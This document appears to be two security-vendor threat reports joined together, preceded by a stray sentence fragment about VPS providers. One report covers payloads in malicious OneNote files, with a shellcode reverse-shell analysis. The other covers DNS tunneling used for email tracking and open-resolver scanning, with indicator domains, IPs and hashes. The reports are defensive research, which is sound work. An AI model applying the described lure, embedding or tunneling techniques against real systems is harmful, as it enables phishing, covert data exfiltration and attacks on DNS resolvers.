The attackers used Chinese VPS providers, such as Cloudie Limited and Zenlayer, for several of their C2 servers. It is interesting to note that some of those VPS services are offered in Yuan only. The fact that the service is offered only in Yuan can strengthen the connection to Chinese operators, but of course it’s not limited to them.

Payload Trends in Malicious OneNote Samples

Executive Summary

In this post, we look at the types of embedded payloads that attackers leverage to abuse Microsoft OneNote files. Our analysis of roughly 6,000 malicious OneNote samples from WildFire reveals that these samples have a phishing-like theme where attackers use one or more images to lure people into clicking or interacting with OneNote files. The interaction then executes an embedded malicious payload.

Since macros have been disabled by default in Office, attackers have turned to leveraging other Microsoft products for embedding malicious payloads. As a result, malicious OneNote files have grown in popularity. The OneNote desktop app is included by default in Windows in Office 2019 and Microsoft 365, which can load malicious OneNote files if someone accidentally opens one.

We find that attackers have the freedom to embed either text-based malicious scripts or binary files inside OneNote. This offers them more flexibility compared to traditional macros in documents.

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • Next-Generation Firewall with cloud-delivered security services including WildFire.
  • Prisma Access devices with cloud-delivered security services including WildFire.
  • Cortex XDR and XSIAM agents help protect against post-exploitation activities using the multi-layer protection approach.
  • The Unit 42 Incident Response team can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk.
Related Unit 42 Topics Microsoft, Phishing

Background

Microsoft OneNote is a digital note-taking application that is part of the Microsoft Office suite. A OneNote file is essentially a digital notebook where people can store various types of information.

Additionally, Microsoft OneNote allows people to embed external files, enabling them to store files such as videos, images or even scripts and executables. However, Microsoft has started blocking embedded objects with certain extensions that are considered dangerous within OneNote files running on Microsoft 365 on Windows.

However, attackers often abuse the ability to embed objects by planting malicious payloads. Malicious OneNote samples typically disguise themselves as legitimate notes, often including an image and a button.

Attackers use images to draw people’s attention, and they rely on unsuspecting people clicking buttons to launch malicious payloads. This technique is popular for payload delivery as it leverages people’s trust in legitimate note-taking applications.

Figures 1, 2 and 3 show three different varieties of malicious OneNote samples with different types of embedded images and buttons. By hovering over the fake button, we can see the location and type of the payload planted in the OneNote file.

In Figure 1, the malicious OneNote sample asks the target to click on the view button to see the “protected” document. Upon doing so, a malicious VBScript file executes.

Image 1 is a screenshot of a Microsoft OneNote page with the contents blurred. A popup says OneNote. This document is protected. You have to double click “View” button to open this document. View button. A tooltip when hovering over the View button reads File: press to unblock document.vbs. Size: 88.9 KB.
Figure 1. OneNote sample with embedded malicious VBS.

Similarly, Figures 2 and 3 show malicious OneNote documents with fake buttons that entice victims to execute an embedded EXE payload and an Office 97-2003 payload, respectively.

Image 2 is a screenshot of Microsoft OneNote. Blue CLICK TO VIEW DOCUMENT button. A tooltip when hovering over the View button reads File: cc.EXE. Size: 734 KB.
Figure 2. OneNote sample with embedded malicious EXE file.
Image 3 is a screenshot of a Microsoft OneNote page with the contents blurred. Purple text in all-caps reads SECURED ONENOTE DOCUMENT. Purple Click To View Document button. A tooltip when hovering over the View Document button reads File: Floor_Drawingshta.Doc. Size: 1.39 KB.
Figure 3. OneNote sample with embedded malicious Office 97-2003 file.

Methodology

As mentioned above, attackers mostly abuse OneNote files for malicious payload delivery. To do so, they tend to embed a few specific payload types such as the following:

  • JavaScript
  • VBScript
  • PowerShell
  • HTML application (HTA)

Despite the different file types, these payloads often show similar behaviors and aim to achieve the same malicious objectives. However, we won't delve into the entire attack and infection chain, as we have covered this in a previous article on malicious OneNote attachments.

The telltale sign of a malicious OneNote file is the presence of embedded objects. While benign OneNote files can also contain embedded objects, malicious OneNote files almost invariably include them.

According to Microsoft, files embedded in OneNote start with a specific globally unique identifier (GUID) tag:

  • {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}

This GUID indicates the presence of a FileDataStoreObject object. The GUID is then followed by the size of the embedded file.

The actual embedded file follows 20 bytes after the aforementioned GUID tag and will be as long as the defined size. For example, in Figure 4 below:

  • Box 1 represents the embedded object GUID tag
  • Box 2 indicates the size of the embedded object
  • Box 3 represents the actual embedded object
Image 4 is a screenshot of embedded objects in a OneNote file. Three different areas are highlighted in red and labeled 1, 2, 3.
Figure 4. Identification of embedded objects in a OneNote file.

Payload Types and Average Size Distribution

As illustrated in Figure 5, attackers predominantly use the following seven file types for their OneNote payloads:

  • PowerShell
  • VBScript
  • Batch
  • HTA
  • Office 97-2003
  • EXE
  • JavaScript (this file type is the most commonly used)
Image 5 is a pie chart of the types of payloads in the malicious files. The largest amount is JavaScript at 46.6%, followed by PowerShell at 33.7%. Next is Batch at 8.2%, followed in increasingly smaller amounts by VBScript, Office 97-2003, HTA and EXE.
Figure 5. Distribution of payload types embedded in malicious OneNote files.

We also extracted and noted the size of each payload type, as shown in Figure 6.

Image 6 is a column chart showing the distribution of payload type by size with EXE the largest at over 1,000 KB. The second largest is Office 97-2003. VBScript, Batch, PowerShell, HTA and JavaScript are all much smaller at under 50 KB.
Figure 6. Average sizes of payloads found in malicious OneNote samples grouped by payload type.

While larger binary embedded payloads such as EXE and Office 97-2003 are more capable, attackers tend to use them less often (as shown in Figure 5) because they increase the overall size of the OneNote sample. Attackers tend to prefer a smaller overall file size, as smaller-sized malware is easier to include in common malware delivery mechanisms such as email attachments, thus raising less suspicion.

As illustrated in Figure 6 above, embedded malicious EXE and Office 97-2003 file payloads tend to be larger, and embedded malicious HTA and JavaScript files tend to be smaller.

Presence of Images in Malicious OneNote Samples

Attackers creating malicious OneNote lures use images that look like buttons to trick people into launching harmful payloads. We mapped out the number of images in each malicious OneNote sample with the payload type, and then calculated the median number of images.

In analyzing the 6,000 samples in our dataset, we found that all but three (99.9%) of the malicious OneNote samples contained at least one image. Since almost all of the samples contain at least one image, we can confirm our hypothesis that OneNote samples are primarily used as phishing vehicles.

Figure 7 shows that the median number of images per payload type is two. For instance, attackers could use both a fake button and an attention-grabbing image like a fake “secure” document banner to make their phishing campaign more believable (such as in Figure 3).

Image 7 is a column chart of the median image count for different payload types. JavaScript, PowerShell and Batch are nearly even and the highest amount at 3. VBScript, HTA, EXE and Office 97-2003 are smaller at 2.
Figure 7. Median image count for different payload types embedded in OneNote malware grouped by payload type.

The chart above demonstrates that two to three images typically accompany payloads in malicious OneNote samples, some used to make the document more believable and some serving as fake buttons.

Analysis of an Embedded EXE Payload

While our previous research examined OneNote samples that carry the more common and popular payload types, such as PowerShell or HTA, EXE payloads have gotten less attention. In this section, we will analyze a OneNote sample with an embedded EXE payload.

The payload below is extracted from a OneNote sample with the following SHA256 hash:

  • d48bcca19522af9e11d5ce8890fe0b8daa01f93c95e6a338528892e152a4f63c

The payload itself has the following SHA256 hash:

  • 92d057720eab41e9c6bb684e834da632ff3d79b1d42e027e761d21967291ca50

Figure 8 shows our analysis of the EXE payload in IDA Pro. We found a handful of code blocks, which often signal that we might be dealing with shellcode.

Our assumption was confirmed by the existence of GS:60, which points to the Process Environment Block (PEB) and the rotate right (ROR) instruction. This indicates that the malware is using dynamic address resolution for functions and hashing for function identification.

Image 8 is a diagram of the EXE payload opened in the disassembler IDA Pro. Red rectangles hone in on the different instructions within the architecture.
Figure 8. EXE payload opened in IDA.

To get an understanding of the objective of the shellcode and identify the libraries it was dynamically loading, we opened it in the x64dbg debugger. We then put a breakpoint at the function that repeatedly calls the loc_140004021 function block in a loop, as shown in Figure 9.

Image 9 is a screenshot of highlighted functions that were dynamically loaded. A blue arrow points to a row highlighted in grey.
Figure 9. Breakpoint set to identify the functions that are being dynamically loaded.

The combination of the WSAStringToAddressA function (shown in Figure 10) and WSASocketW functions (shown in Figure 11) makes it clear that the shellcode is attempting to send or receive data by establishing a network socket.

Image 10 is a screenshot of recorded function WSAStringToAddressA highlighted in the RSI register. It is indicated by two blue arrows as well as a red rectangle. The lower indicated line is highlighted in grey.
Figure 10. Function name WSAStringToAddressA recorded in the RSI register.
Image 11 is a screenshot of recorded function WSASpclertW highlighted in the RSI register. It is indicated in a red rectangle. Lower down, a line is highlighted in grey and indicated by a blue arrow.
Figure 11. Function name WSASpclertW recorded in the RSI register.

Since reverse TCP shells are the most common type of shellcode used for connecting back to the attacker's machine, we set up breakpoints in ws2_32.dll (shown in Figure 12) to determine whether the connect function is called. And if so, we could extract the arguments passed down to it. These arguments often have the IP address and port number to which the payload attempts to connect.

Image 12 is a screenshot of the breakpoints for ws2_32.dll. A line in left pane is highlighted in grey. Two addresses in the right pane are highlighted in red.
Figure 12. Breakpoint set at function connect in ws2_32.dll.

As expected, the shellcode stopped at the connect function call. Upon dumping the values of the RDX register, we were able to identify the contents of the sockaddr_in struct, as shown in Figure 13.

Image 13 is a screenshot of the contents of sockaddr_in highlighted in a red rectangle on the lower left of the screenshot.
Figure 13. Content of sockaddr_in struct dump.

As shown in Figure 14, we then wrote a Python script to unpack the content of the sockaddr_in structure identified above.

Image 14 is a screenshot of Python code unpacking sockaddr_in contents.
Figure 14. Python script unpacking content of sockaddr_in struct.

Executing the above Python script gave us the output shown in Figure 15, indicating the attacker is connecting to a local machine on port 4444, potentially to an attacker-controlled machine.

Image 15 is a screenshot of Python script that contains the IP address and port, labeled in lines 2 and 3 of the image.
Figure 15. IP address and port the payload is connecting to.

Conclusion

We conclude that OneNote as an attack vector is more versatile than we initially thought. It can carry executable payloads, in addition to script-based downloaders. Also, like many other file types, attackers can use it for lateral movement.

When embedding malicious payloads inside OneNote files, attackers mainly leverage JavaScript, PowerShell, Batch and VBScript. However, attackers occasionally use binary payloads such as executables or even Office 97-2003 files to achieve their objectives.

Organizations can consider blocking embedded payloads with dangerous extensions within OneNote files to protect their users against such attacks. More broadly, we recommend people limit their exposure by checking the embedded payload filenames and extensions in OneNote files by hovering over any buttons or images before clicking them.

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • Next-Generation Firewall with cloud-delivered security services including WildFire.
  • Prisma Access devices with cloud-delivered security services including WildFire.
  • Cortex XDR and XSIAM agents help protect against post-exploitation activities using the multi-layer protection approach.
  • The Unit 42 Incident Response team can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk.

Indicators of Compromise

The following are links to our Github repository containing file hashes for the OneNote files and payloads discovered during our research for this article.

Additional Resources

 

Leveraging DNS Tunneling for Tracking and Scanning

Executive Summary

This article presents a case study on new applications of domain name system (DNS) tunneling we have found in the wild. These techniques expand beyond DNS tunneling only for command and control (C2) and virtual private network (VPN) purposes.

Malicious actors occasionally employ DNS tunneling as a covert communications channel, because it can bypass conventional network firewalls. This allows C2 traffic and data exfiltration that can remain hidden from some traditional detection methods.

However, we recently detected three recent campaigns using DNS tunneling for purposes outside of traditional C2 and VPN use: scanning and tracking. In scanning, adversaries employ DNS tunneling to scan a victim's network infrastructure and gather information useful for future attacks. In tracking, adversaries use DNS tunneling techniques to track delivery of malicious emails and monitor the use of Content Delivery Networks (CDN).

This article provides a detailed case study that reveals how adversaries have used DNS tunneling for both scanning and tracking. We aim to increase awareness of these new use cases and provide further insight that can help security professionals better protect their networks.

We have built a system to monitor for DNS tunneling, and this detection is embedded in our DNS Security solution. Palo Alto Networks Next-Generation Firewall customers can access this through our DNS Security subscription to help secure their environment against this malicious activity. Customers also receive protection from the threats discussed here through the Advanced URL Filtering subscription.

  • Cortex XDR customers receive protection against the DNS tunneling techniques mentioned in this article through our Cortex XDR Analytics Engine.
  • Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated in light of the IoCs shared in this research.
  • Prisma Cloud protects cloud environments against DNS tunneling techniques mentioned in this article.
  • If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.
Related Unit 42 Topics DNS Tunneling, DNS Security

DNS Tunneling

DNS tunneling embeds information into DNS requests and responses in a manner that allows a compromised host to communicate through DNS traffic with a nameserver controlled by an attacker. An example is illustrated below in Figure 1.

A typical use case for DNS tunneling includes the following steps:

  • Attackers first register a domain malicious[.]site and then establish a C2 server that uses DNS tunneling as a communication channel. Attackers have many options to set up this C2 channel, such as by abusing Cobalt Strike.
  • Attackers can create, develop or acquire malware that communicates with the server as a client and send this malware to a compromised client machine.
  • The compromised machine is usually behind a firewall and cannot directly communicate with attackers’ servers. However, the malware can encode the data into the subdomain of malicious[.]site and make a DNS query toward the DNS resolver, as shown in Figure 1.
  • Due to the unique nature of tunneling fully qualified domain names (FQDNs), the DNS resolver cannot find corresponding records from its cache. As a result, the resolver will then conduct recursive DNS queries toward root nameservers, top-level domain (TLD) nameservers and attacker-controlled authoritative nameservers for this domain.
  • Attackers can obtain the decoded data from DNS traffic and manipulate the DNS response to infiltrate malicious data to the client.
Image 1 is a diagram of how data exfiltration and infiltration work with DNS tunneling. The client server communicates with the DNS resolver. Icon for read/write from the cache. From the DNS resolver the addresses communicate with the root name servers, the top level domain name servers and the authoritative name servers.
Figure 1. An overview of data exfiltration and infiltration with DNS tunneling.

How Is DNS Tunneling Hidden?

DNS tunneling is hidden due to three factors.

  • Traditional firewalls can reject unauthorized traffic. However, DNS traffic over User Datagram Protocol (UDP) port 53 is ubiquitous and commonly allowed through firewalls and other network security measures.
  • DNS tunneling is conducted via a logical channel between the compromised client and the attacker’s server, with the implementation of DNS protocol. That means the client machine does not communicate with the attacker's server directly, adding another layer of obscurity.
  • Attackers typically encode data sent during exfiltration and infiltration with their own customized methods, which disguises the data within seemingly legitimate DNS traffic.

How Do Adversaries Leverage DNS Tunneling?

The use of DNS tunneling for C2 purposes enables attackers to establish stealthy and resilient communication channels, facilitating malicious activities such as data exfiltration and infiltration. Well-known campaigns such as DarkHydrus, OilRig, xHunt, SUNBURST and Decoy Dog leverage DNS tunneling for C2.

The DNS types used by attackers include:

  • IPv4 (A)
  • IPv6 (AAAA)
  • Mail exchange (MX)
  • Canonical name (CNAME)
  • Text (TXT) records

Some VPN vendors also use DNS tunneling for legitimate purposes, such as bypassing firewalls to avoid internet censorship or network service charges.

In addition to C2 and VPN purposes, attackers can also use DNS tunneling for tracking and scanning, as we’ve observed in recent tunneling campaigns.

  • DNS tunneling for tracking:
    • Attackers can track victims’ activities with regard to spam, phishing or advertisement contents. They do so by delivering malicious domains to victims with their identity information encoded in subdomain payloads.
  • DNS tunneling for scanning:
    • Attackers can scan network infrastructure by encoding the IP address and timestamp in the tunneling payloads, with spoofed source IP addresses. Then, the attackers are able to discover open resolvers so that they can exploit resolver vulnerabilities to perform DNS attacks – which can lead to malicious redirection or denial of service.

To better understand these two new use cases, our next sections cover the campaigns we have discovered using DNS tunneling for tracking and for scanning.

DNS Tunneling for Tracking

To track a victim's behavior in conventional C2 communications, a threat actor's malware embeds data from a user's actions in URLs that it transmits to a C2 server through web traffic. In DNS tunneling, attackers accomplish the same result by using subdomains in DNS traffic.

In this application of DNS tunneling, an attacker's malware embeds information on a specific user and that user's actions into a unique subdomain of a DNS query. This subdomain is the tunneling payload, and the DNS query for the FQDN uses an attacker-controlled domain.

An authoritative nameserver for the attacker-controlled domain receives the DNS query. This attacker-controlled nameserver stores all DNS queries for the domain. The unique subdomains and timestamps of these DNS queries provide a log of the victim's activity. This is not limited to a single victim, and attackers can use it to track multiple victims from their campaign.

TrkCdn DNS Tunneling Campaign

We call this campaign "TrkCdn" due to the characteristics of the domain names used for its DNS tunneling. Based on our analysis, we believe the DNS tunneling technique used in the TrkCdn campaign is meant to track a victim's interaction with its email content. Our data indicates the attacker targeted 731 potential victims. This campaign used 75 IP addresses for nameservers, resolving 658 attacker-controlled domains.

Each domain only uses a single nameserver IP address, while one nameserver IP address can serve up to 123 domains. These domains use the same DNS configurations and the same encoding method for their subdomains. The attacker registered all domains under [.]com or [.]info TLDs and set domain names by combining two or three root words, which is a practice attackers use to avoid domain generation algorithm (DGA) detection.

A subset of these domains are as follows:

  • simitor[.]com
  • vibnere[.]com
  • edrefo[.]com
  • pordasa[.]info
  • vitrfar[.]info
  • frotel[.]info

A list of these domains along with sample FQDNs, nameservers, nameserver IP addresses and registration dates are shown below in Table 1. Because this campaign leveraged DNS tunneling only under the trk subdomain and configured a CNAME record under the cdn subdomain, we named this campaign TrkCdn.

Domain Sample FQDN Nameservers Nameserver IP Address Registration Date
simitor[.]com 04b16bbbf91be3e2fee2c83151131cf5.trk.simitor[.]com ns1.simitor[.]com

ns2.simitor[.]com

193.9.114[.]43 July 6, 2023
vibnere[.]com a8fc70b86e828ffed0f6b3408d30a037.trk.vibnere[.]com ns1.vibnere[.]com

ns2.vibnere[.]com

193.9.114[.]43 June 14, 2023
edrefo[.]com 6e4ae1209a2afe123636f6074c19745d.trk.edrefo[.]com ns1.edrefo[.]com

ns2.edrefo[.]com

193.9.114[.]43 July 26, 2023
pordasa[.]info 2c0b9017cf55630f1095ff42d9717732.trk.pordasa[.]info ns1.pordasa[.]info

ns2.pordasa[.]info

172.234.25[.]151 Oct. 11, 2022
vitrfar[.]info 0fa17586a20ef2adf2f927c78ebaeca3.trk.vitrfar[.]info ns1.vitrfar[.]info

ns2.vitrfar[.]info

172.234.25[.]151 Nov. 21, 2022
frotel[.]info 50e5927056538d5087816be6852397f6.trk.frotel[.]info ns1.frotel[.]info

ns2.frotel[.]info

172.234.25[.]151 Nov. 21, 2022

Table 1. A subset of the domains used in the TrkCdn campaign.

Tracking Mechanism

We believe the DNS tunneling technique used in the TrkCdn campaign is meant to track a victim's interaction with its email content. Analysis of DNS traffic for simitor[.]com reveals how attackers could achieve this.

Here, we only show the tracking-relevant DNS configurations used by this tunneling domain. 193.9.114[.]43 served as the same IP address for the root domain, nameservers and cdn.simitor[.]com. This behavior is a common indicator for tunneling domains, because attackers need to build a nameserver for themselves while also trying to reduce attack cost. Therefore, they typically use only a single IP address for both domain hosting and name server.

All *.trk.simitor[.]com are redirected to cdn.simitor[.]com via a wildcard DNS record as shown below.

For the TrkCdn campaign, MD5 hash values represent email addresses in the DNS traffic. These MD5 values are subdomains for the DNS queries of a tunneling payload. For example, an email address of unit42@not-a-real-domain[.]com has an MD5 value of 4e09ef9806fb9af448a5efcd60395815. Therefore, the FQDN of a DNS query for the tunneling payload would be 4e09ef9806fb9af448a5efcd60395815.trk.simitor[.]com.

DNS queries for these FQDNs can act as a tracking mechanism for emails sent by the threat actor. For example, if a victim opens one of these emails, embedded content might automatically generate the DNS query, or a victim could click on a link within the email. However this happens, after an infected host generates a DNS query for the FQDN, the DNS resolver will contact the IP address for the authoritative nameserver of the FQDN. Due to its wildcard configuration, the victim's DNS resolver would obtain the following result:

Hence, even though the FQDNs vary across different targets, they are all forwarded to the same IP address used by cdn.simitor[.]com. This authoritative name server then returns a DNS result that leads to an attacker-controlled server that delivers attacker-controlled content. This content can include advertisements, spam or phishing contents.

For tracking purposes, attackers can query DNS logs from their authoritative nameservers and compare the payload with the hash values of the email addresses. This way, attackers can know when a specific victim opens one of their emails or clicks on a link, and they can monitor campaign performance.

For example, a graph showing the cumulative distribution function (CDF) of DNS queries for FQDNs from the TrkCdn campaign is shown below in Figure 2. This graph shows the total percentage of DNS queries for TrkCdn FQDNs from 0 to 30 days. The graph indicates that approximately 80% of victims view the campaign's emails only once, while an additional 10% view the messages again within approximately one week. Attackers can view this FQDN data from their authoritative nameservers in the same manner.

Image 2 is a graph of the life cycle of a specific domain. The horizontal axis measures the days and the vertical axis measures the percentage.
Figure 2. The CDF of FQDN span days in the TrkCdn campaign.

Domain Lifecycle

By investigating an older domain pordasa[.]info, we conclude that the TrkCdn domain lifecycle goes through four distinct phases. These four phases are as follows:

  • Incubation phase (two to 12 weeks)
    • After the domain registration, attackers only configure the DNS settings and do nothing else, attempting to avoid malicious newly registered domain detection.
  • Active phase (two to three weeks)
    • Attackers actively distribute thousands of FQDNs to the corresponding victims’ email addresses.
  • Tracking phase (nine to 11 months)
    • Victims query the FQDNs, while attackers track their behaviors by obtaining DNS logs.
  • Retirement phase (one year after registration)
    • Attackers typically stop updating the domain registration after one year.

Below, Figure 3 shows an example of this lifecycle for pordasa[.]info. An attacker used this domain for DNS tunneling-style tracking, originally registering it on Oct. 12, 2022.

Image 3 is a graph of the life cycle of a specific domain. The incubation phase lasts 60 days. The active phase starts shortly after. The tracking phase extends to day 270 and the domain registration ends and the retirement phase starts on day 360.
Figure 3. The lifecycle of the pordasa[.]info domain.

TrkCdn Persistence

Until February 2024, we found adversaries using new IP addresses and registering new domains for their authoritative nameservers associated with TrkCdn activity. Attackers registered these domains between Oct. 19, 2020, and Jan. 2, 2024. We analyze the timeline of domain registration and the domain's first use across different IP addresses.

Figure 4 tracks the use of TrkCdn domains associated with 49 IP addresses. As noted in Figure 4, the majority of IP addresses used for TrkCdn's authoritative nameservers lie within the 185.121.0[.]0/16 or the 146.70.0[.]0/16 subnets. This indicates that the threat actor behind TrkCdn tends to use specific hosting providers.

Image 4 is a timeline of domain registration (blue dots) and domain first use (red dots). The horizontal axis shows the timeline, which covers November 2020 through April 2024. The vertical axis shows the IP address. There are many clusters starting in late 2024 and extending into April.
Figure 4. The timeline of TrkCdn domain registration and usage across different IP addresses.

SpamTracker DNS Tunneling Campaign

Our second example is a campaign using DNS tunneling to track spam delivery. Because this campaign uses DNS tunneling for spam tracking, we have nicknamed this campaign "SpamTracker."

This campaign uses a similar tracking mechanism as the TrkCdn campaign. This campaign is related to 44 tunneling domains that have an IP address of 35.75.233[.]210 for its authoritative nameservers.

These domains share the same DGA naming method and subdomain encoding method used by the TrkCdn campaign. Nameservers for the A records of these domains are hosted on IP addresses that fall into the 103.8.88[.]64/27 subnet. This campaign originated from Japan, and most of the targets were part of educational institutions.

This campaign employs emails and website links to deliver spam and phishing content that covers the following subjects:

  • Fortune-telling services
  • Fake package delivery updates
  • Secondary job offers
  • Lifetime free items

Figure 5 shows an example of these emails. The intent of the campaign is to lure victims to click on the links behind which threat actors have concealed their payload in the subdomains.

Image 5 is a screenshot of a SpamTracker campaign. The lines alternate in Japanese characters and English translations.
Figure 5. An email example (and English translation) used in the SpamTracker campaign.

Victims will be redirected to websites containing fraudulent information, such as the fortune-telling services shown in Figure 6.

Image 6 is a screenshot of a fake fortune-telling website. The English title is Jewel Ring. There are Japanese and Chinese characters used on multiple lines.
Figure 6. A fake fortune-telling website in the SpamTracker campaign.

Table 2 lists six domains from this campaign along with an example of FQDNs, the nameservers, nameserver IP addresses and registration times.

Domain Sample FQDN Nameservers Nameserver IP Address Registration Time
wzbhk2ccghtshr[.]com 21pwt2otx07d3et.wzbhk2ccghtshr[.]com ns01.wzbhk2ccghtshr[.]com

ns02.wzbhk2ccghtshr[.]com

35.75.233[.]210 May 15, 2023
epyujbhfhbs35j[.]com y0vkmu2eh896he7.epyujbhfhbs35j[.]com ns01.epyujbhfhbs35j[.]com

ns02.epyujbhfhbs35j[.]com

35.75.233[.]210 May 15, 2023
8egub9e7s6cz7n[.]com q8udswcmvznk34q.8egub9e7s6cz7n[.]com ns01.8egub9e7s6cz7n[.]com

ns02.8egub9e7s6cz7n[.]com

35.75.233[.]210 May 15, 2023
hjmpfsamfkj5m5[.]com run0ibnpq8r34dj.hjmpfsamfkj5m5[.]com ns01.hjmpfsamfkj5m5[.]com

ns02.hjmpfsamfkj5m5[.]com

35.75.233[.]210 May 15, 2023
uxjxfg2ui8k5zk[.]com vfct3phbmc8qsx2.uxjxfg2ui8k5zk[.]com ns01.uxjxfg2ui8k5zk[.]com

ns02.uxjxfg2ui8k5zk[.]com

35.75.233[.]210 May 15, 2023
cgb488dixfxjw7[.]com htujn1rhh3553tc.cgb488dixfxjw7[.]com ns01.cgb488dixfxjw7[.]com

ns02.cgb488dixfxjw7[.]com

35.75.233[.]210 May 15, 2023

Table 2. The list of the domains used in the SpamTracker campaign.

DNS Tunneling for Scanning

Network scanning, which seeks vulnerabilities within network infrastructures, is usually the first stage of cyberattacks. However, the use case of DNS tunneling for network scanning is understudied. As a result, uncovering the scanning applications of tunneling campaigns can help us prevent cyberattacks at an early stage, mitigating potential damage.

SecShow DNS Tunneling Campaign

We found a new campaign in which threat actors leverage tunneling to periodically scan a victim's network infrastructure, and then they typically perform reflection attacks. Their malicious actions include the following:

  • Seeking open resolvers
  • Testing resolver delays
  • Exploiting resolver vulnerabilities
  • Obtaining time-to-live (TTL) information.

This campaign generally targets open resolvers. As a result, we find victims mainly come from education, high tech and government fields, where open resolvers are commonly found. This campaign contains three domains, leveraging various subdomains to achieve different network scanning.

We list these three domains along with examples of FQDNs, nameservers, nameserver IP addresses and registration times in Table 3. These domains share the nameserver IP address of 202.112.47[.]45. We named this campaign "SecShow" due to the domain names the attackers used.

Domain Sample FQDN Nameservers Nameserver IP Address Registration Time
secshow[.]net 6a134b4f-1.c.secshow[.]net ns1.c.secshow[.]net.

ns2.c.secshow[.]net.

202.112.47[.]45 July 27, 2023
secshow[.]online 1-103-170-192-121-103-170-192-9.f.secshow[.]online ns.secshow[.]online. 202.112.47[.]45 Nov. 5, 2023
secdns[.]site 0-53aa2a46-202401201-ans-dnssec.l-test.secdns[.]site ns1.l-test.secdns[.]site.

ns2.l-test.secdns[.]site.

202.112.47[.]45 Dec. 13, 2023

Table 3. The list of the domains used in the SecShow campaign.

SecShow Tunneling Use

SecShow uses different subdomain values for different scanning purposes. Here, we present four use cases to show how attackers scan the networks.

Case 1: bc2874fb-1.c.secshow[.]net

In this FQDN, bc2874fb is a hexadecimal encoding for IP address 188.40.116[.]251 and -1 is a counter to make the FQDN unique while the nameserver domain is c.secshow[.]net.

Attackers first spoof a random source IP address (e.g., 188.40.116[.]251) and make a DNS query to a candidate IP address for the encoded FQDN (bc2874fb-1.c.secshow[.]net). Once the attackers’ authoritative nameserver (c.secshow[.]net) receives a DNS query, they can obtain the incoming resolver’s IP address and the encoded source IP address used for this query.

Attackers repeat this process with different spoofed IP addresses and discover the open resolvers in the networks and the IP addresses that these open resolvers service. This can be the first step for DNS spoofing, DNS cache poisoning or DNS amplification attacks.

Case 2: 20240212190003.bailiwick.secshow[.]net

This FQDN type only appears every Monday at 19:00:03 UTC. The payload indicates a timestamp (e.g., on Feb. 12, 2024, at 19:00:03 UTC) that is the generation time for this FQDN.

Attackers spoof a source IP address and query this FQDN from a resolver IP address. Attackers can perform the following activities:

  • Test the query delays for this resolver
  • Check whether their domain is blocked and the query is forwarded to a sinkhole
  • Exploit the vulnerabilities of this resolver

Attackers achieve the first two objectives by analyzing logs from their authoritative nameserver. To exploit the vulnerabilities of the resolver, the response of this query contains an A record for another domain:

In the above code, afusdnfysbsf[.]com was a malicious domain that had been revoked. However, its record can still be cached by resolvers. Therefore, attackers might leverage some resolver’s cache vulnerabilities in older software versions (for example, CVE-2012-1033) to prevent domain name revocation.

Case 3: 1-103-170-192-121-103-170-192-9.h.secshow[.]net

The payload starts with a counter padding of 1 followed by two IP addresses of 103.170.192[.]121 and 103.170.192[.]9 that are the spoofed source IP address and the resolver's destination IP address.

This FQDN type is similar to Case 1. However, the A record of this FQDN is a random IP address that varies along with query attempts, with a long TTL of 86400. This feature could be exploited to perform the following activities:

  • DNS amplification distributed denial-of-service (DDoS) attacks
  • DNS cache poisoning attacks
  • Resource exhaustion attacks

Case 4: 0-53ea2a3a-202401201-ans-dnssec.l-test.secdns[.]site

The payload contains a pre-padding of 0 followed by a hex-encoded IP address (53ea2a3a), a date (20240120), and post-padding (1). We observe that attackers use this type of FQDN to obtain the following information:

  • Max/min TTL
  • Timeout
  • Query speed information

These are useful for some DNS threats such as Phoenix Domain [PDF] and Ghost Domain Names.

Mitigation

The DNS tunneling domains used in these campaigns can be detected by Palo Alto Networks firewall products. However, we also suggest the following measures to reduce the attack surface of DNS resolvers.

  • Control the service range of resolvers to accept necessary queries only
  • Promptly update the resolver software version to prevent N-day vulnerabilities

Conclusion

DNS tunneling techniques can be leveraged by adversaries to perform various actions not normally associated with DNS tunneling. Despite the conventional impression that tunneling is used for C2 and VPN purposes, we also find that attackers can use DNS tunneling as a vehicle for victim activity tracking and network scanning.

Palo Alto Networks Next-Generation Firewall customers receive protections against malicious indicators (domain, IP address) mentioned in this article via Advanced URL Filtering and our DNS Security subscription services.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America Toll-Free: 866.486.4842 (866.4.UNIT42)
  • EMEA: +31.20.299.3130
  • APAC: +65.6983.8730
  • Japan: +81.50.1790.0200

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

Domains used for DNS tunneling

  • 85hsyad6i2ngzp[.]com
  • 8egub9e7s6cz7n[.]com
  • 8jtuazcr548ajj[.]com
  • anrad9i7fb2twm[.]com
  • aucxjd8rrzh7xf[.]com
  • b5ba24k6xhxn7b[.]com
  • cgb488dixfxjw7[.]com
  • d6zeh4und3yjt9[.]com
  • epyujbhfhbs35j[.]com
  • hhmk9ixaw9p3ec[.]com
  • hjmpfsamfkj5m5[.]com
  • iszedim8xredu2[.]com
  • npknraafbisrs7[.]com
  • patycyfswg33nh[.]com
  • rhctiz9xijd4yc[.]com
  • sn9jxsrp23x63a[.]com
  • swh9cpz2xntuge[.]com
  • tp7djzjtcs6gm6[.]com
  • uxjxfg2ui8k5zk[.]com
  • wzbhk2ccghtshr[.]com
  • y43dkbzwar7cdt[.]com
  • ydxpwzhidexgny[.]com
  • z54zspih9h5588[.]com
  • 3yfr6hh9dd3[.]com
  • 4bs6hkaysxa[.]com
  • 66tye9kcnxi[.]com
  • 8kk68biiitj[.]com
  • 93dhmp7ipsp[.]com
  • api536yepwj[.]com
  • bb62sbtk3yi[.]com
  • cytceitft8g[.]com
  • dipgprjp8uu[.]com
  • ege6wf76eyp[.]com
  • f6kf5inmfmj[.]com
  • f6ywh2ud89u[.]com
  • h82c3stb3k5[.]com
  • hwa85y4icf5[.]com
  • ifjh5asi25f[.]com
  • m9y6dte7b9i[.]com
  • n98erejcf9t[.]com
  • rz53par3ux2[.]com
  • szd4hw4xdaj[.]com
  • wj9ii6rx7yd[.]com
  • wk7ckgiuc6i[.]com
